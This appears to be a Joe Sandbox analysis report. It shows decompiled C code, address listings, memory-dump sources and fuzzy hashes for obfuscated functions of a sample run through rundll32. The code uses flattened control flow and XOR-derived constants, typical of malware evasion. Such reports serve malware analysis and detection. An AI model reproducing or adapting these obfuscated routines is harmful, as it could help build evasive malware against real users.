                                                                                                                      									_t426 = _t426 + 0x18;
                                                                                                                      									_t374 = 0x247652d;
                                                                                                                      									 *((short*)(_t364 - 2)) = 0;
                                                                                                                      									while(1) {
                                                                                                                      										L1:
                                                                                                                      										_t347 = 0xfb52c5;
                                                                                                                      										goto L2;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t374 == 0x7db0050) {
                                                                                                                      										_t420 = 0x1000;
                                                                                                                      										_push(_t374);
                                                                                                                      										_push(_t374);
                                                                                                                      										 *(_t426 + 0x74) = 0x1000;
                                                                                                                      										_t411 = E00687FF2(0x1000);
                                                                                                                      										_t347 = 0xfb52c5;
                                                                                                                      										__eflags = _t411;
                                                                                                                      										_t374 =  !=  ? 0xfb52c5 : 0xf828486;
                                                                                                                      										continue;
                                                                                                                      									} else {
                                                                                                                      										if(_t374 == 0xebf23c2) {
                                                                                                                      											_t374 = 0x4334ccc;
                                                                                                                      											continue;
                                                                                                                      										} else {
                                                                                                                      											if(_t374 != 0xf828486) {
                                                                                                                      												L30:
                                                                                                                      												__eflags = _t374 - 0x24bb42a;
                                                                                                                      												if(__eflags != 0) {
                                                                                                                      													continue;
                                                                                                                      												} else {
                                                                                                                      												}
                                                                                                                      											} else {
                                                                                                                      												E00691E67( *(_t426 + 0x94),  *(_t426 + 0x48),  *(_t426 + 0x88),  *(_t426 + 0x7c), _t372);
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						return 0;
                                                                                                                      						goto L32;
                                                                                                                      					}
                                                                                                                      					E00698519( *(_t426 + 0x68),  *(_t426 + 0x74), _t411);
                                                                                                                      					_t374 = 0xf828486;
                                                                                                                      					_t347 = 0xfb52c5;
                                                                                                                      					goto L30;
                                                                                                                      				}
                                                                                                                      			}






















                                                                                                                      0x006885d4
                                                                                                                      0x006885dc
                                                                                                                      0x006885e4
                                                                                                                      0x006885ec
                                                                                                                      0x006885f4
                                                                                                                      0x00688607
                                                                                                                      0x0068860e
                                                                                                                      0x00688619
                                                                                                                      0x00688621
                                                                                                                      0x00688626
                                                                                                                      0x00688633
                                                                                                                      0x00688637
                                                                                                                      0x0068863f
                                                                                                                      0x0068864a
                                                                                                                      0x00688655
                                                                                                                      0x00688660
                                                                                                                      0x0068866d
                                                                                                                      0x00688671
                                                                                                                      0x00688679
                                                                                                                      0x00688679
                                                                                                                      0x00688679
                                                                                                                      0x00000000
                                                                                                                      0x0068867e
                                                                                                                      0x0068868c
                                                                                                                      0x00688806
                                                                                                                      0x0068880b
                                                                                                                      0x0068880e
                                                                                                                      0x00688810
                                                                                                                      0x00688854
                                                                                                                      0x00688812
                                                                                                                      0x00688812
                                                                                                                      0x00688814
                                                                                                                      0x00688814
                                                                                                                      0x00688818
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068881a
                                                                                                                      0x00688832
                                                                                                                      0x00688837
                                                                                                                      0x0068883a
                                                                                                                      0x0068883c
                                                                                                                      0x0068884a
                                                                                                                      0x0068884b
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00688864
                                                                                                                      0x00688864
                                                                                                                      0x00000000
                                                                                                                      0x0068883e
                                                                                                                      0x0068883e
                                                                                                                      0x00688840
                                                                                                                      0x00688842
                                                                                                                      0x0068885d
                                                                                                                      0x00688844
                                                                                                                      0x00688844
                                                                                                                      0x00688814
                                                                                                                      0x00688818
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00688818
                                                                                                                      0x00000000
                                                                                                                      0x00688842
                                                                                                                      0x00688814
                                                                                                                      0x00688868
                                                                                                                      0x00688868
                                                                                                                      0x0068886a
                                                                                                                      0x0068888d
                                                                                                                      0x00688892
                                                                                                                      0x00000000
                                                                                                                      0x0068886c
                                                                                                                      0x00688870
                                                                                                                      0x0068887d
                                                                                                                      0x00688883
                                                                                                                      0x00000000
                                                                                                                      0x00688883
                                                                                                                      0x00000000
                                                                                                                      0x00688692
                                                                                                                      0x00688698
                                                                                                                      0x006887b9
                                                                                                                      0x006887be
                                                                                                                      0x006887c0
                                                                                                                      0x006887c3
                                                                                                                      0x006887c6
                                                                                                                      0x006887cc
                                                                                                                      0x00688679
                                                                                                                      0x00688679
                                                                                                                      0x00688679
                                                                                                                      0x00000000
                                                                                                                      0x00688679
                                                                                                                      0x00688679
                                                                                                                      0x0068869e
                                                                                                                      0x006886a4
                                                                                                                      0x0068874a
                                                                                                                      0x00688765
                                                                                                                      0x0068876a
                                                                                                                      0x0068876c
                                                                                                                      0x00688771
                                                                                                                      0x00688776
                                                                                                                      0x00688679
                                                                                                                      0x00688679
                                                                                                                      0x00688679
                                                                                                                      0x00000000
                                                                                                                      0x00688679
                                                                                                                      0x006886aa
                                                                                                                      0x006886b0
                                                                                                                      0x006886ff
                                                                                                                      0x0068870e
                                                                                                                      0x0068870f
                                                                                                                      0x00688710
                                                                                                                      0x0068871a
                                                                                                                      0x0068871c
                                                                                                                      0x00688722
                                                                                                                      0x00688729
                                                                                                                      0x00000000
                                                                                                                      0x006886b2
                                                                                                                      0x006886b8
                                                                                                                      0x006886f4
                                                                                                                      0x00000000
                                                                                                                      0x006886ba
                                                                                                                      0x006886c0
                                                                                                                      0x006888b2
                                                                                                                      0x006888b2
                                                                                                                      0x006888b8
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x006888be
                                                                                                                      0x006886c6
                                                                                                                      0x006886dd
                                                                                                                      0x006886e2
                                                                                                                      0x006886c0
                                                                                                                      0x006886b8
                                                                                                                      0x006886b0
                                                                                                                      0x006886a4
                                                                                                                      0x00688698
                                                                                                                      0x006886f1
                                                                                                                      0x00000000
                                                                                                                      0x006886f1
                                                                                                                      0x006888a2
                                                                                                                      0x006888a8
                                                                                                                      0x006888ad
                                                                                                                      0x00000000
                                                                                                                      0x006888ad

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Q$/&X$Lz$N'`$S,I$Ze$q_
                                                                                                                      • API String ID: 0-1837206032
                                                                                                                      • Opcode ID: 46b81b709f89228e37a7f61169cd600b2d592a7ba0c5e943ddbd8ee39e793391
                                                                                                                      • Instruction ID: 918498450265e43cfd7f9aa68f4380cade8cf0e415f823283162a96dcdd9c2d4
                                                                                                                      • Opcode Fuzzy Hash: 46b81b709f89228e37a7f61169cd600b2d592a7ba0c5e943ddbd8ee39e793391
                                                                                                                      • Instruction Fuzzy Hash: 9D0231711083809FD368DF25C489A5FBBE2FBC4758F508A1DF29A86260DBB49949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E0068E5CF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                      				char _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				void* _t170;
                                                                                                                      				void* _t181;
                                                                                                                      				void* _t184;
                                                                                                                      				void* _t189;
                                                                                                                      				void* _t192;
                                                                                                                      				void* _t195;
                                                                                                                      				void* _t197;
                                                                                                                      				void* _t220;
                                                                                                                      				signed int _t221;
                                                                                                                      				signed int _t222;
                                                                                                                      				signed int _t223;
                                                                                                                      				signed int* _t226;
                                                                                                                      
                                                                                                                      				_push(_a8);
                                                                                                                      				_t219 = _a4;
                                                                                                                      				_t195 = __ecx;
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E006920B9(_t170);
                                                                                                                      				_v56 = 0xa4c651;
                                                                                                                      				_t226 =  &(( &_v116)[4]);
                                                                                                                      				_v56 = _v56 ^ 0x6a6d8bac;
                                                                                                                      				_v56 = _v56 ^ 0x6ac6bd64;
                                                                                                                      				_t220 = 0;
                                                                                                                      				_v60 = 0xbac055;
                                                                                                                      				_t197 = 0xf39239f;
                                                                                                                      				_v60 = _v60 << 0xd;
                                                                                                                      				_v60 = _v60 ^ 0x580542e6;
                                                                                                                      				_v108 = 0xd580f5;
                                                                                                                      				_v108 = _v108 ^ 0x97cdda0d;
                                                                                                                      				_v108 = _v108 + 0x37dd;
                                                                                                                      				_v108 = _v108 >> 0xe;
                                                                                                                      				_v108 = _v108 ^ 0x00021113;
                                                                                                                      				_v52 = 0xf28435;
                                                                                                                      				_v52 = _v52 | 0x057a1a90;
                                                                                                                      				_v52 = _v52 ^ 0x05fdc129;
                                                                                                                      				_v80 = 0x5c8bc8;
                                                                                                                      				_t221 = 0x27;
                                                                                                                      				_v80 = _v80 / _t221;
                                                                                                                      				_t222 = 0x1b;
                                                                                                                      				_v80 = _v80 * 9;
                                                                                                                      				_v80 = _v80 ^ 0x0013f028;
                                                                                                                      				_v96 = 0x281d9a;
                                                                                                                      				_v96 = _v96 + 0xffff8f77;
                                                                                                                      				_v96 = _v96 + 0x4719;
                                                                                                                      				_v96 = _v96 << 0xf;
                                                                                                                      				_v96 = _v96 ^ 0xfa152b1c;
                                                                                                                      				_v112 = 0x7415d8;
                                                                                                                      				_v112 = _v112 >> 0xf;
                                                                                                                      				_v112 = _v112 + 0xfffff76c;
                                                                                                                      				_v112 = _v112 >> 0xd;
                                                                                                                      				_v112 = _v112 ^ 0x000d779a;
                                                                                                                      				_v88 = 0xb68707;
                                                                                                                      				_v88 = _v88 ^ 0x45e0ecf4;
                                                                                                                      				_v88 = _v88 + 0xffff71c0;
                                                                                                                      				_v88 = _v88 ^ 0x455519c2;
                                                                                                                      				_v116 = 0xceabf6;
                                                                                                                      				_v116 = _v116 + 0x1225;
                                                                                                                      				_v116 = _v116 / _t222;
                                                                                                                      				_v116 = _v116 >> 6;
                                                                                                                      				_v116 = _v116 ^ 0x0006e3bb;
                                                                                                                      				_v84 = 0xd525a4;
                                                                                                                      				_v84 = _v84 + 0xffff1243;
                                                                                                                      				_v84 = _v84 + 0x1c30;
                                                                                                                      				_v84 = _v84 ^ 0x00df7efc;
                                                                                                                      				_v100 = 0xf29ecf;
                                                                                                                      				_v100 = _v100 << 0xc;
                                                                                                                      				_v100 = _v100 + 0xffff4e95;
                                                                                                                      				_v100 = _v100 ^ 0x70d6065d;
                                                                                                                      				_v100 = _v100 ^ 0x593d89f0;
                                                                                                                      				_v104 = 0x2206c6;
                                                                                                                      				_v104 = _v104 | 0x38687435;
                                                                                                                      				_v104 = _v104 ^ 0xadcf411b;
                                                                                                                      				_v104 = _v104 ^ 0x9549ac77;
                                                                                                                      				_v104 = _v104 ^ 0x00e3f730;
                                                                                                                      				_v92 = 0xd38a43;
                                                                                                                      				_v92 = _v92 >> 3;
                                                                                                                      				_v92 = _v92 + 0x6fd1;
                                                                                                                      				_v92 = _v92 ^ 0x0012c73c;
                                                                                                                      				_v64 = 0x625266;
                                                                                                                      				_v64 = _v64 + 0x2436;
                                                                                                                      				_v64 = _v64 ^ 0x006987c3;
                                                                                                                      				_v68 = 0xe296bd;
                                                                                                                      				_v68 = _v68 << 0xd;
                                                                                                                      				_v68 = _v68 ^ 0x52d9a139;
                                                                                                                      				_v72 = 0x54a2fd;
                                                                                                                      				_v72 = _v72 << 0xd;
                                                                                                                      				_v72 = _v72 >> 0xa;
                                                                                                                      				_v72 = _v72 ^ 0x002b3e4c;
                                                                                                                      				_v76 = 0x32cdcd;
                                                                                                                      				_v76 = _v76 << 0xb;
                                                                                                                      				_t223 = 0x32;
                                                                                                                      				_v76 = _v76 / _t223;
                                                                                                                      				_v76 = _v76 ^ 0x0302c408;
                                                                                                                      				_v48 = 0x2d2164;
                                                                                                                      				_v48 = _v48 + 0xfffff0e0;
                                                                                                                      				_v48 = _v48 ^ 0x0021ab5a;
                                                                                                                      				do {
                                                                                                                      					while(_t197 != 0x2168849) {
                                                                                                                      						if(_t197 == 0x29fa3de) {
                                                                                                                      							_t184 = E00682A21(_v84, _v100,  &_v44, _t219 + 0x20, _v104);
                                                                                                                      							_t226 =  &(_t226[3]);
                                                                                                                      							__eflags = _t184;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								_t197 = 0x74ac459;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							if(_t197 == 0x545de14) {
                                                                                                                      								E00683DBC( &_v44, _t195, _v56, _v60, _v108);
                                                                                                                      								_t226 =  &(_t226[3]);
                                                                                                                      								_t197 = 0x2168849;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t197 == 0x6ab10c5) {
                                                                                                                      									_t189 = E00682A21(_v112, _v88,  &_v44, _t219 + 0x1c, _v116);
                                                                                                                      									_t226 =  &(_t226[3]);
                                                                                                                      									__eflags = _t189;
                                                                                                                      									if(__eflags != 0) {
                                                                                                                      										_t197 = 0x29fa3de;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t197 == 0x74ac459) {
                                                                                                                      										_t192 = E00682A21(_v92, _v64,  &_v44, _t219 + 0x28, _v68);
                                                                                                                      										_t226 =  &(_t226[3]);
                                                                                                                      										__eflags = _t192;
                                                                                                                      										if(__eflags != 0) {
                                                                                                                      											_t197 = 0x9dbfb8a;
                                                                                                                      											continue;
                                                                                                                      										}
                                                                                                                      									} else {
                                                                                                                      										if(_t197 == 0x9dbfb8a) {
                                                                                                                      											__eflags = E0069D97D( &_v44, _v72, __eflags, _v76, _t219 + 4, _v48);
                                                                                                                      											_t220 =  !=  ? 1 : _t220;
                                                                                                                      											__eflags = _t220;
                                                                                                                      										} else {
                                                                                                                      											if(_t197 != 0xf39239f) {
                                                                                                                      												goto L19;
                                                                                                                      											} else {
                                                                                                                      												_t197 = 0x545de14;
                                                                                                                      												continue;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L22:
                                                                                                                      						return _t220;
                                                                                                                      					}
                                                                                                                      					_t181 = E00682A21(_v52, _v80,  &_v44, _t219 + 0x14, _v96);
                                                                                                                      					_t226 =  &(_t226[3]);
                                                                                                                      					__eflags = _t181;
                                                                                                                      					if(__eflags == 0) {
                                                                                                                      						_t197 = 0x90a774d;
                                                                                                                      						goto L19;
                                                                                                                      					} else {
                                                                                                                      						_t197 = 0x6ab10c5;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L22;
                                                                                                                      					L19:
                                                                                                                      					__eflags = _t197 - 0x90a774d;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L22;
                                                                                                                      			}

                                                                                                                      0x0068e982
                                                                                                                      0x0068e984
                                                                                                                      0x0068e984
                                                                                                                      0x0068e86b
                                                                                                                      0x0068e871
                                                                                                                      0x00000000
                                                                                                                      0x0068e877
                                                                                                                      0x0068e877
                                                                                                                      0x00000000
                                                                                                                      0x0068e877
                                                                                                                      0x0068e871
                                                                                                                      0x0068e865
                                                                                                                      0x0068e85d
                                                                                                                      0x0068e855
                                                                                                                      0x0068e849
                                                                                                                      0x0068e988
                                                                                                                      0x0068e990
                                                                                                                      0x0068e990
                                                                                                                      0x0068e93a
                                                                                                                      0x0068e93f
                                                                                                                      0x0068e942
                                                                                                                      0x0068e944
                                                                                                                      0x0068e950
                                                                                                                      0x00000000
                                                                                                                      0x0068e946
                                                                                                                      0x0068e946
                                                                                                                      0x00000000
                                                                                                                      0x0068e946
                                                                                                                      0x00000000
                                                                                                                      0x0068e955
                                                                                                                      0x0068e955
                                                                                                                      0x0068e955
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 5th8$6$$L>+$Mw$Mw$d!-$fRb
                                                                                                                      • API String ID: 0-2045295228
                                                                                                                      • Opcode ID: 6f2f31d65536ce47fea8f5922934b6de45e61ae0ad55fa75fcdf554af6f56bec
                                                                                                                      • Instruction ID: ac2ef67a2cd5a9d81b2b4e2faf1e057494803a062321373957c33152ff6f58ea
                                                                                                                      • Opcode Fuzzy Hash: 6f2f31d65536ce47fea8f5922934b6de45e61ae0ad55fa75fcdf554af6f56bec
                                                                                                                      • Instruction Fuzzy Hash: 739164B2508341ABC798DE61C88945FFBE6FBD8758F004A1DF58292220D7B1DA19CF87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E0068E2CC(void* __edx, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                      				char _v556;
                                                                                                                      				intOrPtr _v576;
                                                                                                                      				char _v600;
                                                                                                                      				signed int _v604;
                                                                                                                      				signed int _v608;
                                                                                                                      				signed int _v612;
                                                                                                                      				signed int _v616;
                                                                                                                      				signed int _v620;
                                                                                                                      				signed int _v624;
                                                                                                                      				signed int _v628;
                                                                                                                      				signed int _v632;
                                                                                                                      				signed int _v636;
                                                                                                                      				signed int _v640;
                                                                                                                      				signed int _v644;
                                                                                                                      				signed int _v648;
                                                                                                                      				signed int _v652;
                                                                                                                      				void* __ecx;
                                                                                                                      				void* _t136;
                                                                                                                      				void* _t151;
                                                                                                                      				signed int _t153;
                                                                                                                      				signed int _t156;
                                                                                                                      				void* _t162;
                                                                                                                      				signed int _t167;
                                                                                                                      				intOrPtr _t187;
                                                                                                                      				signed int _t188;
                                                                                                                      				signed int _t189;
                                                                                                                      				signed int _t190;
                                                                                                                      				signed int _t191;
                                                                                                                      				signed int _t192;
                                                                                                                      				signed int* _t196;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_t187 = _a8;
                                                                                                                      				_push(_t187);
                                                                                                                      				_push(E00688E4D);
                                                                                                                      				_push(__edx);
                                                                                                                      				E006920B9(_t136);
                                                                                                                      				_v608 = 0x1ac257;
                                                                                                                      				_t196 =  &(( &_v652)[5]);
                                                                                                                      				_v608 = _v608 ^ 0x78a3296c;
                                                                                                                      				_v608 = _v608 ^ 0x78b9eb39;
                                                                                                                      				_t162 = 0xac58df2;
                                                                                                                      				_v624 = 0x387e66;
                                                                                                                      				_t9 =  &_v624; // 0x387e66
                                                                                                                      				_t188 = 0x2e;
                                                                                                                      				_v624 =  *_t9 * 0x13;
                                                                                                                      				_v624 = _v624 / _t188;
                                                                                                                      				_v624 = _v624 ^ 0x001972d5;
                                                                                                                      				_v644 = 0x433552;
                                                                                                                      				_v644 = _v644 + 0xffffa6b6;
                                                                                                                      				_v644 = _v644 ^ 0x94defa20;
                                                                                                                      				_v644 = _v644 << 1;
                                                                                                                      				_v644 = _v644 ^ 0x293db944;
                                                                                                                      				_v652 = 0xb70b59;
                                                                                                                      				_v652 = _v652 << 0xb;
                                                                                                                      				_v652 = _v652 + 0xffff8138;
                                                                                                                      				_t189 = 0x15;
                                                                                                                      				_v652 = _v652 / _t189;
                                                                                                                      				_v652 = _v652 ^ 0x08c5a62f;
                                                                                                                      				_v616 = 0xf4782f;
                                                                                                                      				_v616 = _v616 >> 0xa;
                                                                                                                      				_v616 = _v616 + 0xffff066a;
                                                                                                                      				_v616 = _v616 ^ 0xfff8c7bc;
                                                                                                                      				_v604 = 0x656560;
                                                                                                                      				_v604 = _v604 >> 3;
                                                                                                                      				_v604 = _v604 ^ 0x0000606f;
                                                                                                                      				_v648 = 0x377d9b;
                                                                                                                      				_t190 = 0x7f;
                                                                                                                      				_v648 = _v648 / _t190;
                                                                                                                      				_v648 = _v648 + 0xfd7f;
                                                                                                                      				_v648 = _v648 + 0xffff6b0a;
                                                                                                                      				_v648 = _v648 ^ 0x00006649;
                                                                                                                      				_v636 = 0x80cedd;
                                                                                                                      				_t191 = 0x58;
                                                                                                                      				_v636 = _v636 / _t191;
                                                                                                                      				_v636 = _v636 + 0x515e;
                                                                                                                      				_v636 = _v636 ^ 0x000b92de;
                                                                                                                      				_v620 = 0x65d9bd;
                                                                                                                      				_v620 = _v620 + 0xffff4b50;
                                                                                                                      				_v620 = _v620 ^ 0xd34cfccc;
                                                                                                                      				_v620 = _v620 ^ 0xd32e4bd2;
                                                                                                                      				_v632 = 0xb89e86;
                                                                                                                      				_v632 = _v632 + 0xffffcc79;
                                                                                                                      				_t192 = 0x2f;
                                                                                                                      				_v632 = _v632 / _t192;
                                                                                                                      				_v632 = _v632 ^ 0x00046a67;
                                                                                                                      				_v628 = 0xbb1c4a;
                                                                                                                      				_v628 = _v628 >> 6;
                                                                                                                      				_v628 = _v628 >> 9;
                                                                                                                      				_v628 = _v628 ^ 0x000a4ee8;
                                                                                                                      				_v640 = 0xfd7114;
                                                                                                                      				_v640 = _v640 << 5;
                                                                                                                      				_v640 = _v640 * 0x45;
                                                                                                                      				_v640 = _v640 + 0xa2ea;
                                                                                                                      				_v640 = _v640 ^ 0x89e0c310;
                                                                                                                      				_v612 = 0x26e293;
                                                                                                                      				_v612 = _v612 >> 0xd;
                                                                                                                      				_v612 = _v612 ^ 0x00050986;
                                                                                                                      				_t193 = _v612;
                                                                                                                      				do {
                                                                                                                      					while(_t162 != 0x249e110) {
                                                                                                                      						if(_t162 == 0x48c9d54) {
                                                                                                                      							_v556 = 0x22c;
                                                                                                                      							_t153 = E0069C15D(_t193, _v652, _v616,  &_v556, _v604);
                                                                                                                      							_t196 =  &(_t196[3]);
                                                                                                                      							asm("sbb ecx, ecx");
                                                                                                                      							_t167 =  ~_t153 & 0xf758a92f;
                                                                                                                      							L13:
                                                                                                                      							_t162 = _t167 + 0xe63f1a5;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t162 == 0x5bc9ad4) {
                                                                                                                      							_t156 = E00688E4D( &_v556,  &_v600);
                                                                                                                      							asm("sbb ecx, ecx");
                                                                                                                      							_t167 =  ~_t156 & 0xf3e5ef6b;
                                                                                                                      							goto L13;
                                                                                                                      						}
                                                                                                                      						if(_t162 == 0xac58df2) {
                                                                                                                      							_v576 = _t187;
                                                                                                                      							_t162 = 0xcf1a497;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t162 != 0xcf1a497) {
                                                                                                                      							if(_t162 == 0xe63f1a5) {
                                                                                                                      								return E00691E67(_v632, _v628, _v640, _v612, _t193);
                                                                                                                      							}
                                                                                                                      							goto L18;
                                                                                                                      						}
                                                                                                                      						_push(_t162);
                                                                                                                      						_t156 = E00685988(_t162, _v608);
                                                                                                                      						_t193 = _t156;
                                                                                                                      						if(_t156 != 0xffffffff) {
                                                                                                                      							_t162 = 0x48c9d54;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						L8:
                                                                                                                      						return _t156;
                                                                                                                      					}
                                                                                                                      					_t151 = E00682A58(_v648, _t193,  &_v556, _v636, _v620);
                                                                                                                      					_t196 =  &(_t196[3]);
                                                                                                                      					if(_t151 == 0) {
                                                                                                                      						_t162 = 0xe63f1a5;
                                                                                                                      						goto L18;
                                                                                                                      					} else {
                                                                                                                      						_t162 = 0x5bc9ad4;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L8;
                                                                                                                      					L18:
                                                                                                                      				} while (_t162 != 0xad68edc);
                                                                                                                      				return _t156;
                                                                                                                      			}


































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: If$R5C$^Q$`ee$f~8$o`$N
                                                                                                                      • API String ID: 0-3572798563
                                                                                                                      • Opcode ID: 0d0dab3ceb09791deef85f5d6326cd93d027299f435210b68a2181010516b070
                                                                                                                      • Instruction ID: f342dfafa9e80babf85e3cd826d809a258b3bae1564d0620afbb84b96af69533
                                                                                                                      • Opcode Fuzzy Hash: 0d0dab3ceb09791deef85f5d6326cd93d027299f435210b68a2181010516b070
                                                                                                                      • Instruction Fuzzy Hash: 1A7175725083019FC758DF22C88985FBBE2EBC4768F504A1DF596962A0D7768A09CF87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • _strcpy_s.LIBCMT ref: 10014B9E
                                                                                                                        • Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4
                                                                                                                      • __snprintf_s.LIBCMT ref: 10014BD7
                                                                                                                        • Part of subcall function 1003119A: __vsnprintf_s_l.LIBCMT ref: 100311AF
                                                                                                                      • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 10014C02
                                                                                                                      • LoadLibraryA.KERNEL32(?), ref: 10014C25
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoLibraryLoadLocale__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
                                                                                                                      • String ID: LOC
                                                                                                                      • API String ID: 3864805678-519433814
                                                                                                                      • Opcode ID: 993ef955d11e1d056c0da4e243e940ae0abcf9c49e17b7ca6a81ba24efbb4c92
                                                                                                                      • Instruction ID: c6b9acf05ba5f485c5c472c95a6cc1a1d49ea65b07ecc8430683ae88ba63382e
                                                                                                                      • Opcode Fuzzy Hash: 993ef955d11e1d056c0da4e243e940ae0abcf9c49e17b7ca6a81ba24efbb4c92
                                                                                                                      • Instruction Fuzzy Hash: B011E471900118AFDB11DB64CC86BDD73B8EF09315F1241A1F7059F0A1EEB0E9859AD1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0068CF47(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20) {
                                                                                                                      				char _v32;
                                                                                                                      				intOrPtr _v40;
                                                                                                                      				intOrPtr _v52;
                                                                                                                      				intOrPtr _v56;
                                                                                                                      				intOrPtr _v88;
                                                                                                                      				char* _v92;
                                                                                                                      				char _v112;
                                                                                                                      				char _v120;
                                                                                                                      				intOrPtr _v124;
                                                                                                                      				char _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				signed int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				signed int _v180;
                                                                                                                      				signed int _v184;
                                                                                                                      				signed int _v188;
                                                                                                                      				signed int _v192;
                                                                                                                      				signed int _v196;
                                                                                                                      				signed int _v200;
                                                                                                                      				signed int _v204;
                                                                                                                      				signed int _v208;
                                                                                                                      				signed int _v212;
                                                                                                                      				signed int _v216;
                                                                                                                      				signed int _v220;
                                                                                                                      				signed int _v224;
                                                                                                                      				signed int _v228;
                                                                                                                      				signed int _v232;
                                                                                                                      				signed int _v236;
